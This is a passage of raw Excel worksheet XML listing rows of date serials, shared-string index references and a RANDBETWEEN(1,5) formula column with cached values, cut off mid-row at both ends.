        <v>43281.591886574075</v>
      </c>
      <c r="C13075" t="s">
        <v>48</v>
      </c>
      <c r="E13075" t="s">
        <v>11720</v>
      </c>
      <c r="F13075">
        <f t="shared" ca="1" si="204"/>
        <v>1</v>
      </c>
    </row>
    <row r="13076" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13076" s="1">
        <v>43281.581388888888</v>
      </c>
      <c r="C13076" t="s">
        <v>10</v>
      </c>
      <c r="D13076" t="s">
        <v>46</v>
      </c>
      <c r="E13076" t="s">
        <v>11721</v>
      </c>
      <c r="F13076">
        <f t="shared" ca="1" si="204"/>
        <v>2</v>
      </c>
    </row>
    <row r="13077" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13077" s="1">
        <v>43281.575601851851</v>
      </c>
      <c r="C13077" t="s">
        <v>339</v>
      </c>
      <c r="E13077" t="s">
        <v>11722</v>
      </c>
      <c r="F13077">
        <f t="shared" ca="1" si="204"/>
        <v>3</v>
      </c>
    </row>
    <row r="13078" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13078" s="1">
        <v>43281.450231481482</v>
      </c>
      <c r="C13078" t="s">
        <v>197</v>
      </c>
      <c r="F13078">
        <f t="shared" ca="1" si="204"/>
        <v>4</v>
      </c>
    </row>
    <row r="13079" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13079" s="1">
        <v>43281.382233796299</v>
      </c>
      <c r="C13079" t="s">
        <v>229</v>
      </c>
      <c r="F13079">
        <f t="shared" ca="1" si="204"/>
        <v>5</v>
      </c>
    </row>
    <row r="13080" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13080" s="1">
        <v>43281.214039351849</v>
      </c>
      <c r="C13080" t="s">
        <v>48</v>
      </c>
      <c r="E13080" s="2" t="s">
        <v>11723</v>
      </c>
      <c r="F13080">
        <f t="shared" ca="1" si="204"/>
        <v>3</v>
      </c>
    </row>
    <row r="13081" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13081" s="1">
        <v>43281.122824074075</v>
      </c>
      <c r="C13081" t="s">
        <v>10088</v>
      </c>
      <c r="D13081" t="s">
        <v>71</v>
      </c>
      <c r="E13081" t="s">
        <v>8504</v>
      </c>
      <c r="F13081">
        <f t="shared" ca="1" si="204"/>
        <v>4</v>
      </c>
    </row>
    <row r="13082" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A13082" s="1">
        <v>43281.105057870373</v>
      </c>
      <c r="C13082" t="s">
        <v>48</v>
      </c>
      <c r="D13082" t="s">
        <v>330</v>
      </c>
      <c r="E13082" s="2" t="s">
        <v>11724</v>
      </c>
      <c r="F13082">
        <f t="shared" ca="1" si="204"/>
        <v>2</v>
      </c>
    </row>
    <row r="13083" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13083" s="1">
        <v>43281.043923611112</v>
      </c>
      <c r="C13083" t="s">
        <v>41</v>
      </c>
      <c r="E13083" t="s">
        <v>11725</v>
      </c>
      <c r="F13083">
        <f t="shared" ca="1" si="204"/>
        <v>5</v>
      </c>
    </row>
    <row r="13084" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A13084" s="1">
        <v>43280.965590277781</v>
      </c>
      <c r="C13084" t="s">
        <v>10</v>
      </c>
      <c r="D13084" t="s">
        <v>885</v>
      </c>
      <c r="E13084" s="2" t="s">
        <v>11726</v>
      </c>
      <c r="F13084">
        <f t="shared" ca="1" si="204"/>
        <v>4</v>
      </c>
    </row>
    <row r="13085" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13085" s="1">
        <v>43280.945474537039</v>
      </c>
      <c r="C13085" t="s">
        <v>41</v>
      </c>
      <c r="E13085" t="s">
        <v>11727</v>
      </c>
      <c r="F13085">
        <f t="shared" ca="1" si="204"/>
        <v>2</v>
      </c>
    </row>
    <row r="13086" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13086" s="1">
        <v>43280.917754629627</v>
      </c>
      <c r="C13086" t="s">
        <v>319</v>
      </c>
      <c r="D13086" t="s">
        <v>320</v>
      </c>
      <c r="E13086" s="2" t="s">
        <v>11728</v>
      </c>
      <c r="F13086">
        <f t="shared" ca="1" si="204"/>
        <v>2</v>
      </c>
    </row>
    <row r="13087" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13087" s="1">
        <v>43280.890023148146</v>
      </c>
      <c r="C13087" t="s">
        <v>1931</v>
      </c>
      <c r="D13087" t="s">
        <v>36</v>
      </c>
      <c r="E13087" t="s">
        <v>11729</v>
      </c>
      <c r="F13087">
        <f t="shared" ca="1" si="204"/>
        <v>3</v>
      </c>
    </row>
    <row r="13088" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A13088" s="1">
        <v>43280.882002314815</v>
      </c>
      <c r="C13088" t="s">
        <v>65</v>
      </c>
      <c r="D13088" t="s">
        <v>374</v>
      </c>
      <c r="E13088" s="2" t="s">
        <v>11730</v>
      </c>
      <c r="F13088">
        <f t="shared" ca="1" si="204"/>
        <v>1</v>
      </c>
    </row>
    <row r="13089" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13089" s="1">
        <v>43280.806574074071</v>
      </c>
      <c r="C13089" t="s">
        <v>535</v>
      </c>
      <c r="D13089" t="s">
        <v>36</v>
      </c>
      <c r="E13089" t="s">
        <v>11731</v>
      </c>
      <c r="F13089">
        <f t="shared" ca="1" si="204"/>
        <v>2</v>
      </c>
    </row>
    <row r="13090" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A13090" s="1">
        <v>43280.724305555559</v>
      </c>
      <c r="C13090" t="s">
        <v>10</v>
      </c>
      <c r="D13090" t="s">
        <v>11</v>
      </c>
      <c r="E13090" s="2" t="s">
        <v>11732</v>
      </c>
      <c r="F13090">
        <f t="shared" ca="1" si="204"/>
        <v>2</v>
      </c>
    </row>
    <row r="13091" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13091" s="1">
        <v>43280.688240740739</v>
      </c>
      <c r="C13091" t="s">
        <v>10</v>
      </c>
      <c r="D13091" t="s">
        <v>36</v>
      </c>
      <c r="E13091" t="s">
        <v>11733</v>
      </c>
      <c r="F13091">
        <f t="shared" ca="1" si="204"/>
        <v>1</v>
      </c>
    </row>
    <row r="13092" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13092" s="1">
        <v>43280.644004629627</v>
      </c>
      <c r="C13092" t="s">
        <v>5634</v>
      </c>
      <c r="D13092" t="s">
        <v>36</v>
      </c>
      <c r="E13092" t="s">
        <v>11734</v>
      </c>
      <c r="F13092">
        <f t="shared" ca="1" si="204"/>
        <v>1</v>
      </c>
    </row>
    <row r="13093" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A13093" s="1">
        <v>43280.604479166665</v>
      </c>
      <c r="C13093" t="s">
        <v>10</v>
      </c>
      <c r="D13093" t="s">
        <v>36</v>
      </c>
      <c r="E13093" s="2" t="s">
        <v>11735</v>
      </c>
      <c r="F13093">
        <f t="shared" ca="1" si="204"/>
        <v>1</v>
      </c>
    </row>
    <row r="13094" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A13094" s="1">
        <v>43280.571666666663</v>
      </c>
      <c r="C13094" t="s">
        <v>41</v>
      </c>
      <c r="E13094" s="2" t="s">
        <v>11736</v>
      </c>
      <c r="F13094">
        <f t="shared" ca="1" si="204"/>
        <v>4</v>
      </c>
    </row>
    <row r="13095" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13095" s="1">
        <v>43280.55810185185</v>
      </c>
      <c r="C13095" t="s">
        <v>197</v>
      </c>
      <c r="E13095" t="s">
        <v>11737</v>
      </c>
      <c r="F13095">
        <f t="shared" ca="1" si="204"/>
        <v>3</v>
      </c>
    </row>
    <row r="13096" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13096" s="1">
        <v>43280.557916666665</v>
      </c>
      <c r="C13096" t="s">
        <v>6</v>
      </c>
      <c r="D13096" t="s">
        <v>25</v>
      </c>
      <c r="E13096" t="s">
        <v>11738</v>
      </c>
      <c r="F13096">
        <f t="shared" ca="1" si="204"/>
        <v>2</v>
      </c>
    </row>
    <row r="13097" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13097" s="1">
        <v>43280.542523148149</v>
      </c>
      <c r="C13097" t="s">
        <v>43</v>
      </c>
      <c r="E13097" t="s">
        <v>11739</v>
      </c>
      <c r="F13097">
        <f t="shared" ca="1" si="204"/>
        <v>1</v>
      </c>
    </row>
    <row r="13098" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13098" s="1">
        <v>43280.524004629631</v>
      </c>
      <c r="C13098" t="s">
        <v>10</v>
      </c>
      <c r="D13098" t="s">
        <v>80</v>
      </c>
      <c r="E13098" s="2" t="s">
        <v>11740</v>
      </c>
      <c r="F13098">
        <f t="shared" ca="1" si="204"/>
        <v>1</v>
      </c>
    </row>
    <row r="13099" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A13099" s="1">
        <v>43280.488761574074</v>
      </c>
      <c r="C13099" t="s">
        <v>10</v>
      </c>
      <c r="D13099" t="s">
        <v>6</v>
      </c>
      <c r="E13099" s="2" t="s">
        <v>11741</v>
      </c>
      <c r="F13099">
        <f t="shared" ca="1" si="204"/>
        <v>1</v>
      </c>
    </row>
    <row r="13100" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13100" s="1">
        <v>43280.487199074072</v>
      </c>
      <c r="C13100" t="s">
        <v>10</v>
      </c>
      <c r="D13100" t="s">
        <v>33</v>
      </c>
      <c r="E13100" t="s">
        <v>11742</v>
      </c>
      <c r="F13100">
        <f t="shared" ca="1" si="204"/>
        <v>5</v>
      </c>
    </row>
    <row r="13101" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13101" s="1">
        <v>43280.465266203704</v>
      </c>
      <c r="C13101" t="s">
        <v>318</v>
      </c>
      <c r="E13101" t="s">
        <v>11743</v>
      </c>
      <c r="F13101">
        <f t="shared" ca="1" si="204"/>
        <v>4</v>
      </c>
    </row>
    <row r="13102" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13102" s="1">
        <v>43280.460636574076</v>
      </c>
      <c r="C13102" t="s">
        <v>3994</v>
      </c>
      <c r="D13102" t="s">
        <v>36</v>
      </c>
      <c r="E13102" t="s">
        <v>11744</v>
      </c>
      <c r="F13102">
        <f t="shared" ca="1" si="204"/>
        <v>1</v>
      </c>
    </row>
    <row r="13103" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13103" s="1">
        <v>43280.458391203705</v>
      </c>
      <c r="C13103" t="s">
        <v>60</v>
      </c>
      <c r="D13103" t="s">
        <v>36</v>
      </c>
      <c r="E13103" t="s">
        <v>11745</v>
      </c>
      <c r="F13103">
        <f t="shared" ca="1" si="204"/>
        <v>2</v>
      </c>
    </row>
    <row r="13104" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13104" s="1">
        <v>43280.451770833337</v>
      </c>
      <c r="C13104" t="s">
        <v>10</v>
      </c>
      <c r="D13104" t="s">
        <v>6</v>
      </c>
      <c r="E13104" t="s">
        <v>11746</v>
      </c>
      <c r="F13104">
        <f t="shared" ca="1" si="204"/>
        <v>3</v>
      </c>
    </row>
    <row r="13105" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13105" s="1">
        <v>43280.424039351848</v>
      </c>
      <c r="C13105" t="s">
        <v>10</v>
      </c>
      <c r="D13105" t="s">
        <v>86</v>
      </c>
      <c r="E13105" t="s">
        <v>11747</v>
      </c>
      <c r="F13105">
        <f t="shared" ca="1" si="204"/>
        <v>1</v>
      </c>
    </row>
    <row r="13106" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13106" s="1">
        <v>43280.410185185188</v>
      </c>
      <c r="C13106" t="s">
        <v>260</v>
      </c>
      <c r="E13106" t="s">
        <v>11748</v>
      </c>
      <c r="F13106">
        <f t="shared" ca="1" si="204"/>
        <v>4</v>
      </c>
    </row>
    <row r="13107" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13107" s="1">
        <v>43280.401678240742</v>
      </c>
      <c r="C13107" t="s">
        <v>50</v>
      </c>
      <c r="E13107" t="s">
        <v>11749</v>
      </c>
      <c r="F13107">
        <f t="shared" ca="1" si="204"/>
        <v>3</v>
      </c>
    </row>
    <row r="13108" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13108" s="1">
        <v>43280.387175925927</v>
      </c>
      <c r="C13108" t="s">
        <v>10</v>
      </c>
      <c r="D13108" t="s">
        <v>92</v>
      </c>
      <c r="E13108" t="s">
        <v>11750</v>
      </c>
      <c r="F13108">
        <f t="shared" ca="1" si="204"/>
        <v>4</v>
      </c>
    </row>
    <row r="13109" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13109" s="1">
        <v>43280.385810185187</v>
      </c>
      <c r="C13109" t="s">
        <v>10</v>
      </c>
      <c r="D13109" t="s">
        <v>151</v>
      </c>
      <c r="E13109" t="s">
        <v>11751</v>
      </c>
      <c r="F13109">
        <f t="shared" ca="1" si="204"/>
        <v>1</v>
      </c>
    </row>
    <row r="13110" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A13110" s="1">
        <v>43280.344502314816</v>
      </c>
      <c r="C13110" t="s">
        <v>10</v>
      </c>
      <c r="D13110" t="s">
        <v>17</v>
      </c>
      <c r="E13110" s="2" t="s">
        <v>11752</v>
      </c>
      <c r="F13110">
        <f t="shared" ca="1" si="204"/>
        <v>2</v>
      </c>
    </row>
    <row r="13111" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A13111" s="1">
        <v>43280.341249999998</v>
      </c>
      <c r="C13111" t="s">
        <v>71</v>
      </c>
      <c r="E13111" s="2" t="s">
        <v>11753</v>
      </c>
      <c r="F13111">
        <f t="shared" ca="1" si="204"/>
        <v>3</v>
      </c>
    </row>
    <row r="13112" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13112" s="1">
        <v>43280.316284722219</v>
      </c>
      <c r="C13112" t="s">
        <v>41</v>
      </c>
      <c r="E13112" t="s">
        <v>11754</v>
      </c>
      <c r="F13112">
        <f t="shared" ca="1" si="204"/>
        <v>4</v>
      </c>
    </row>
    <row r="13113" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A13113" s="1">
        <v>43280.248437499999</v>
      </c>
      <c r="C13113" t="s">
        <v>836</v>
      </c>
      <c r="D13113" t="s">
        <v>46</v>
      </c>
      <c r="E13113" s="2" t="s">
        <v>10750</v>
      </c>
      <c r="F13113">
        <f t="shared" ca="1" si="204"/>
        <v>5</v>
      </c>
    </row>
    <row r="13114" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A13114" s="1">
        <v>43280.204791666663</v>
      </c>
      <c r="C13114" t="s">
        <v>50</v>
      </c>
      <c r="E13114" s="2" t="s">
        <v>11755</v>
      </c>
      <c r="F13114">
        <f t="shared" ca="1" si="204"/>
        <v>1</v>
      </c>
    </row>
    <row r="13115" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A13115" s="1">
        <v>43280.202233796299</v>
      </c>
      <c r="C13115" t="s">
        <v>71</v>
      </c>
      <c r="E13115" s="2" t="s">
        <v>11756</v>
      </c>
      <c r="F13115">
        <f t="shared" ca="1" si="204"/>
        <v>5</v>
      </c>
    </row>
    <row r="13116" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A13116" s="1">
        <v>43280.201273148145</v>
      </c>
      <c r="C13116" t="s">
        <v>73</v>
      </c>
      <c r="E13116" s="2" t="s">
        <v>11757</v>
      </c>
      <c r="F13116">
        <f t="shared" ca="1" si="204"/>
        <v>5</v>
      </c>
    </row>
    <row r="13117" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13117" s="1">
        <v>43280.179699074077</v>
      </c>
      <c r="C13117" t="s">
        <v>48</v>
      </c>
      <c r="E13117" s="2" t="s">
        <v>11758</v>
      </c>
      <c r="F13117">
        <f t="shared" ca="1" si="204"/>
        <v>5</v>
      </c>
    </row>
    <row r="13118" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13118" s="1">
        <v>43280.163171296299</v>
      </c>
      <c r="C13118" t="s">
        <v>71</v>
      </c>
      <c r="E13118" t="s">
        <v>11759</v>
      </c>
      <c r="F13118">
        <f t="shared" ca="1" si="204"/>
        <v>2</v>
      </c>
    </row>
    <row r="13119" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A13119" s="1">
        <v>43280.124976851854</v>
      </c>
      <c r="C13119" t="s">
        <v>134</v>
      </c>
      <c r="D13119" t="s">
        <v>312</v>
      </c>
      <c r="E13119" s="2" t="s">
        <v>11760</v>
      </c>
      <c r="F13119">
        <f t="shared" ca="1" si="204"/>
        <v>5</v>
      </c>
    </row>
    <row r="13120" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13120" s="1">
        <v>43280.10355324074</v>
      </c>
      <c r="C13120" t="s">
        <v>318</v>
      </c>
      <c r="D13120" t="s">
        <v>46</v>
      </c>
      <c r="E13120" s="2" t="s">
        <v>11761</v>
      </c>
      <c r="F13120">
        <f t="shared" ca="1" si="204"/>
        <v>5</v>
      </c>
    </row>
    <row r="13121" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13121" s="1">
        <v>43280.011874999997</v>
      </c>
      <c r="C13121" t="s">
        <v>10</v>
      </c>
      <c r="D13121" t="s">
        <v>151</v>
      </c>
      <c r="E13121" t="s">
        <v>11762</v>
      </c>
      <c r="F13121">
        <f t="shared" ca="1" si="204"/>
        <v>1</v>
      </c>
    </row>
    <row r="13122" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13122" s="1">
        <v>43279.879502314812</v>
      </c>
      <c r="C13122" t="s">
        <v>10</v>
      </c>
      <c r="D13122" t="s">
        <v>36</v>
      </c>
      <c r="E13122" t="s">
        <v>11763</v>
      </c>
      <c r="F13122">
        <f t="shared" ref="F13122:F13185" ca="1" si="205">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="13123" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13123" s="1">
        <v>43279.804710648146</v>
      </c>
      <c r="C13123" t="s">
        <v>10</v>
      </c>
      <c r="D13123" t="s">
        <v>17</v>
      </c>
      <c r="E13123" s="2" t="s">
        <v>11764</v>
      </c>
      <c r="F13123">
        <f t="shared" ca="1" si="205"/>
        <v>5</v>
      </c>
    </row>
    <row r="13124" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13124" s="1">
        <v>43279.712013888886</v>
      </c>
      <c r="C13124" t="s">
        <v>10</v>
      </c>
      <c r="D13124" t="s">
        <v>6</v>
      </c>
      <c r="E13124" t="s">
        <v>11765</v>
      </c>
      <c r="F13124">
        <f t="shared" ca="1" si="205"/>
        <v>4</v>
      </c>
    </row>
    <row r="13125" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13125" s="1">
        <v>43279.658148148148</v>
      </c>
      <c r="C13125" t="s">
        <v>10</v>
      </c>
      <c r="D13125" t="s">
        <v>89</v>
      </c>
      <c r="E13125" t="s">
        <v>11766</v>
      </c>
      <c r="F13125">
        <f t="shared" ca="1" si="205"/>
        <v>1</v>
      </c>
    </row>
    <row r="13126" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13126" s="1">
        <v>43279.655543981484</v>
      </c>
      <c r="C13126" t="s">
        <v>10</v>
      </c>
      <c r="D13126" t="s">
        <v>36</v>
      </c>
      <c r="E13126" t="s">
        <v>11767</v>
      </c>
      <c r="F13126">
        <f t="shared" ca="1" si="205"/>
        <v>1</v>
      </c>
    </row>
    <row r="13127" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13127" s="1">
        <v>43279.653298611112</v>
      </c>
      <c r="C13127" t="s">
        <v>10</v>
      </c>
      <c r="D13127" t="s">
        <v>89</v>
      </c>
      <c r="E13127" t="s">
        <v>11768</v>
      </c>
      <c r="F13127">
        <f t="shared" ca="1" si="205"/>
        <v>3</v>
      </c>
    </row>
    <row r="13128" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13128" s="1">
        <v>43279.640196759261</v>
      </c>
      <c r="C13128" t="s">
        <v>10</v>
      </c>
      <c r="D13128" t="s">
        <v>6</v>
      </c>
      <c r="E13128" t="s">
        <v>11769</v>
      </c>
      <c r="F13128">
        <f t="shared" ca="1" si="205"/>
        <v>3</v>
      </c>
    </row>
    <row r="13129" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13129" s="1">
        <v>43279.638819444444</v>
      </c>
      <c r="C13129" t="s">
        <v>10</v>
      </c>
      <c r="D13129" t="s">
        <v>271</v>
      </c>
      <c r="E13129" t="s">
        <v>11770</v>
      </c>
      <c r="F13129">
        <f t="shared" ca="1" si="205"/>
        <v>3</v>
      </c>
    </row>
    <row r="13130" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13130" s="1">
        <v>43279.61917824074</v>
      </c>
      <c r="C13130" t="s">
        <v>50</v>
      </c>
      <c r="E13130" t="s">
        <v>11771</v>
      </c>
      <c r="F13130">
        <f t="shared" ca="1" si="205"/>
        <v>5</v>
      </c>
    </row>
    <row r="13131" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A13131" s="1">
        <v>43279.609652777777</v>
      </c>
      <c r="C13131" t="s">
        <v>10</v>
      </c>
      <c r="D13131" t="s">
        <v>20</v>
      </c>
      <c r="E13131" s="2" t="s">
        <v>11772</v>
      </c>
      <c r="F13131">
        <f t="shared" ca="1" si="205"/>
        <v>4</v>
      </c>
    </row>
    <row r="13132" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13132" s="1">
        <v>43279.598935185182</v>
      </c>
      <c r="C13132" t="s">
        <v>10</v>
      </c>
      <c r="D13132" t="s">
        <v>163</v>
      </c>
      <c r="E13132" t="s">
        <v>11773</v>
      </c>
      <c r="F13132">
        <f t="shared" ca="1" si="205"/>
        <v>3</v>
      </c>
    </row>
    <row r="13133" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13133" s="1">
        <v>43279.592511574076</v>
      </c>
      <c r="C13133" t="s">
        <v>10</v>
      </c>
      <c r="D13133" t="s">
        <v>89</v>
      </c>
      <c r="E13133" t="s">
        <v>11774</v>
      </c>
      <c r="F13133">
        <f t="shared" ca="1" si="205"/>
        <v>4</v>
      </c>
    </row>
    <row r="13134" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13134" s="1">
        <v>43279.532951388886</v>
      </c>
      <c r="C13134" t="s">
        <v>10</v>
      </c>
      <c r="D13134" t="s">
        <v>112</v>
      </c>
      <c r="E13134" t="s">
        <v>11775</v>
      </c>
      <c r="F13134">
        <f t="shared" ca="1" si="205"/>
        <v>4</v>
      </c>
    </row>
    <row r="13135" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A13135" s="1">
        <v>43279.525729166664</v>
      </c>
      <c r="C13135" t="s">
        <v>6</v>
      </c>
      <c r="D13135" t="s">
        <v>25</v>
      </c>
      <c r="E13135" s="2" t="s">
        <v>11776</v>
      </c>
      <c r="F13135">
        <f t="shared" ca="1" si="205"/>
        <v>1</v>
      </c>
    </row>
    <row r="13136" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13136" s="1">
        <v>43279.511724537035</v>
      </c>
      <c r="C13136" t="s">
        <v>48</v>
      </c>
      <c r="F13136">
        <f t="shared" ca="1" si="205"/>
        <v>5</v>
      </c>
    </row>
    <row r="13137" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13137" s="1">
        <v>43279.48369212963</v>
      </c>
      <c r="C13137" t="s">
        <v>10</v>
      </c>
      <c r="D13137" t="s">
        <v>271</v>
      </c>
      <c r="F13137">
        <f t="shared" ca="1" si="205"/>
        <v>2</v>
      </c>
    </row>
    <row r="13138" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13138" s="1">
        <v>43279.479791666665</v>
      </c>
      <c r="C13138" t="s">
        <v>10</v>
      </c>
      <c r="D13138" t="s">
        <v>244</v>
      </c>
      <c r="E13138" t="s">
        <v>11777</v>
      </c>
      <c r="F13138">
        <f t="shared" ca="1" si="205"/>
        <v>3</v>
      </c>
    </row>
    <row r="13139" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13139" s="1">
        <v>43279.466909722221</v>
      </c>
      <c r="C13139" t="s">
        <v>173</v>
      </c>
      <c r="E13139" s="2" t="s">
        <v>11778</v>
      </c>
      <c r="F13139">
        <f t="shared" ca="1" si="205"/>
        <v>4</v>
      </c>
    </row>
    <row r="13140" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A13140" s="1">
        <v>43279.446435185186</v>
      </c>
      <c r="C13140" t="s">
        <v>1077</v>
      </c>
      <c r="D13140" t="s">
        <v>107</v>
      </c>
      <c r="E13140" s="2" t="s">
        <v>11779</v>
      </c>
      <c r="F13140">
        <f t="shared" ca="1" si="205"/>
        <v>4</v>
      </c>
    </row>
    <row r="13141" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A13141" s="1">
        <v>43279.42864583333</v>
      </c>
      <c r="C13141" t="s">
        <v>10</v>
      </c>
      <c r="D13141" t="s">
        <v>36</v>
      </c>
      <c r="E13141" s="2" t="s">
        <v>11780</v>
      </c>
      <c r="F13141">
        <f t="shared" ca="1" si="205"/>
        <v>2</v>
      </c>
    </row>
    <row r="13142" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13142" s="1">
        <v>43279.412662037037</v>
      </c>
      <c r="C13142" t="s">
        <v>253</v>
      </c>
      <c r="E13142" t="s">
        <v>11781</v>
      </c>
      <c r="F13142">
        <f t="shared" ca="1" si="205"/>
        <v>3</v>
      </c>
    </row>
    <row r="13143" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13143" s="1">
        <v>43279.408379629633</v>
      </c>
      <c r="C13143" t="s">
        <v>10</v>
      </c>
      <c r="D13143" t="s">
        <v>163</v>
      </c>
      <c r="E13143" t="s">
        <v>11782</v>
      </c>
      <c r="F13143">
        <f t="shared" ca="1" si="205"/>
        <v>1</v>
      </c>
    </row>
    <row r="13144" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13144" s="1">
        <v>43279.4062037037</v>
      </c>
      <c r="C13144" t="s">
        <v>140</v>
      </c>
      <c r="D13144" t="s">
        <v>847</v>
      </c>
      <c r="E13144" t="s">
        <v>11783</v>
      </c>
      <c r="F13144">
        <f t="shared" ca="1" si="205"/>
        <v>4</v>
      </c>
    </row>
    <row r="13145" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13145" s="1">
        <v>43279.388749999998</v>
      </c>
      <c r="C13145" t="s">
        <v>6</v>
      </c>
      <c r="D13145" t="s">
        <v>25</v>
      </c>
      <c r="E13145" t="s">
        <v>11784</v>
      </c>
      <c r="F13145">
        <f t="shared" ca="1" si="205"/>
        <v>5</v>
      </c>
    </row>
    <row r="13146" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13146" s="1">
        <v>43279.37327546296</v>
      </c>
      <c r="C13146" t="s">
        <v>10</v>
      </c>
      <c r="D13146" t="s">
        <v>163</v>
      </c>
      <c r="E13146" s="2" t="s">
        <v>11785</v>
      </c>
      <c r="F13146">
        <f t="shared" ca="1" si="205"/>
        <v>2</v>
      </c>
    </row>
    <row r="13147" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13147" s="1">
        <v>43279.372037037036</v>
      </c>
      <c r="C13147" t="s">
        <v>6</v>
      </c>
      <c r="D13147" t="s">
        <v>25</v>
      </c>
      <c r="E13147" t="s">
        <v>11786</v>
      </c>
      <c r="F13147">
        <f t="shared" ca="1" si="205"/>
        <v>3</v>
      </c>
    </row>
    <row r="13148" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13148" s="1">
        <v>43279.341203703705</v>
      </c>
      <c r="C13148" t="s">
        <v>6</v>
      </c>
      <c r="D13148" t="s">
        <v>2139</v>
      </c>
      <c r="E13148" t="s">
        <v>11787</v>
      </c>
      <c r="F13148">
        <f t="shared" ca="1" si="205"/>
        <v>1</v>
      </c>
    </row>
    <row r="13149" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13149" s="1">
        <v>43279.336296296293</v>
      </c>
      <c r="C13149" t="s">
        <v>6</v>
      </c>
      <c r="D13149" t="s">
        <v>25</v>
      </c>
      <c r="E13149" t="s">
        <v>11788</v>
      </c>
      <c r="F13149">
        <f t="shared" ca="1" si="205"/>
        <v>4</v>
      </c>
    </row>
    <row r="13150" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A13150" s="1">
        <v>43279.325208333335</v>
      </c>
      <c r="C13150" t="s">
        <v>430</v>
      </c>
      <c r="E13150" s="2" t="s">
        <v>11789</v>
      </c>
      <c r="F13150">
        <f t="shared" ca="1" si="205"/>
        <v>5</v>
      </c>
    </row>
    <row r="13151" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13151" s="1">
        <v>43279.282106481478</v>
      </c>
      <c r="C13151" t="s">
        <v>41</v>
      </c>
      <c r="E13151" t="s">
        <v>11790</v>
      </c>
      <c r="F13151">
        <f t="shared" ca="1" si="205"/>
        <v>1</v>
      </c>
    </row>
    <row r="13152" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13152" s="1">
        <v>43279.271689814814</v>
      </c>
      <c r="C13152" t="s">
        <v>430</v>
      </c>
      <c r="E13152" s="2" t="s">
        <v>11791</v>
      </c>
      <c r="F13152">
        <f t="shared" ca="1" si="205"/>
        <v>5</v>
      </c>
    </row>
    <row r="13153" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13153" s="1">
        <v>43279.267083333332</v>
      </c>
      <c r="C13153" t="s">
        <v>461</v>
      </c>
      <c r="E13153" t="s">
